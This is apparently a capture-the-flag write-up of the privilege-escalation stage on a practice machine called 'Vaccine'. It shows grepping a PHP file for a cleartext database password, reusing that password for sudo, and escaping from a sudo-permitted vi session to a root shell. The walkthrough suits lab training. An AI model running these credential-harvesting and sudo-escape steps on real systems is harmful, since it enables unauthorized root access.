VI

#privesc
postgres@vaccine:~$ sudo -l
 sudo -l
 [sudo] password for postgres: ...

postgres@vaccine:~$ ls /var/www/html
 bg.png	       dashboard.js   index.php    style.css
 dashboard.css  dashboard.php  license.txt

 * if the target uses both PHP & SQL, there may be a chance that the password is in cleartext and could
   be located in /var/www/html
   
postgres@vaccine:~$ cat /var/www/html/dashboard.php | grep password
 <in$ cat /var/www/html/dashboard.php | grep password
 $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
 
postgres@vaccine:~$ sudo -l
 [sudo] password for postgres: P@s5w0rd!

 Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
    XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

 User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

 * ALT: used if/when the shell dies
   ssh postgres@10.129.95.174
    password: P@s5w0rd!
    
 * identified... sudo privileges to edit the pg_hba.conf file using vi by running sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf .
 
root@htb:~$ BROWSER > https://gtfobins.github.io/gtfobins/vi/#sudo
  sudo vi -c ':!/bin/sh' /dev/null
  
 * if the binary is allowed to run as superuser by sudo, it does not drop the 
   elevated privileges and may be used to access the file system, escalate or 
   maintain privileged access.

#
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf -c ':!/bin/sh'
 Sorry, user postgres is not allowed to execute '/bin/vi /etc/postgresql/11/main/pg_hba.conf -c :!/bin/sh' as root on vaccine.
 
 * this is due to sudo being restricted to only /bin/vi /etc/postgresql/11/main/pg_hba.conf .

postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
 ...
 vi :set shell=/bin/bash
 vi :shell

root@vaccine:/var/lib/postgresql# whoami
 root

root@vaccine:/var/lib/postgresql# id
 uid=0(root) gid=0(root) groups=0(root)

root@vaccine:/var/lib/postgresql# ls /root
 pg_hba.conf  root.txt  snap

root@vaccine:/var/lib/postgresql# cat /root/root.txt

PreviousSETUID NextEXECUTION

Last updated 6 days ago